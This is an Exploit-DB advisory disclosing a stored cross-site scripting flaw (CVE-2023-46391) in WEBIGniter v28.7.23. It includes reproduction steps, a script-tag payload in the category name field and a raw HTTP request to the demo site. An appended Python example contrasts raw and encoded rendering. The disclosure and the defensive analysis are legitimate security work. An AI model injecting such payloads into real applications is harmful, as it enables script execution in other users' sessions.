[webapps] WEBIGniter v28.7.23 - Stored Cross Site Scripting (XSS)
source link: https://www.exploit-db.com/exploits/51807
# Exploit Title: WEBIGniter v28.7.23 Stored Cross Site Scripting (XSS)
# Exploit Author: Sagar Banwa
# Date: 19/10/2023
# Vendor: https://webigniter.net/
# Software: https://webigniter.net/demo
# Reference: https://portswigger.net/web-security/cross-site-scripting
# Tested on: Windows 10/Kali Linux
# CVE : CVE-2023-46391
Stored Cross-Site Scripting (XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the two types (stored and reflected). It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS, by contrast, involves reflecting a malicious script off a web application onto a user's browser.
Steps-To-Reproduce:
1. Log in to the account.
2. Go to Categories.
3. Add a category: in the Name field, use the payload "><script>alert(1)</script> and choose cat.php as the layout file.
Request
POST /cms/categories/add HTTP/2
Host: demo.webigniter.net
Cookie: ci_session=iq8k2mjlp2dg4pqa42m3v3dn2d4lmtjb; hash=6ROmvkMoHKviB4zypWJXmjIv6vhTQlFw6bdHlRjX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
Origin: https://demo.webigniter.net
Referer: https://demo.webigniter.net/cms/categories/add
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
name=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&slug=scriptalert1script&layout_file=cat.php
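
Added example (not part of the original advisory and not WEBIGniter's code): it decodes the request body above, renders the stored name into an attribute context with and without output encoding, and parses the result to show whether a script element appears. The form template and all function names are assumptions made for illustration.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Form body copied from the request shown above.
BODY = "name=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&slug=scriptalert1script&layout_file=cat.php"

# Hypothetical edit-form template: the stored name lands inside an attribute.
TEMPLATE = '<form><input type="text" name="name" value="{name}"></form>'

class TagAudit(HTMLParser):
    """Records every start tag and the value attribute of each <input>."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.input_values = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_values.append(dict(attrs).get("value"))

def stored_name(body):
    """Decode the urlencoded body as a server-side form parser would."""
    return parse_qs(body, keep_blank_values=True)["name"][0]

def render_raw(name):
    """Vulnerable form: stored value concatenated into the markup as-is."""
    return TEMPLATE.format(name=name)

def render_encoded(name):
    """Hardened form: encode & < > " ' at output time for the attribute context."""
    return TEMPLATE.format(name=escape(name, quote=True))

def audit(markup):
    """Parse the markup and return (start tags seen, <input> value attributes)."""
    parser = TagAudit()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.input_values

if __name__ == "__main__":
    name = stored_name(BODY)
    for label, render in (("raw", render_raw), ("encoded", render_encoded)):
        tags, values = audit(render(name))
        print(f"{label:8} tags={tags} input value={values}")
```

In the raw render the leading "> closes the value attribute and the input tag, so the parser sees a separate script element; in the encoded render the same characters stay inside the attribute as inert text.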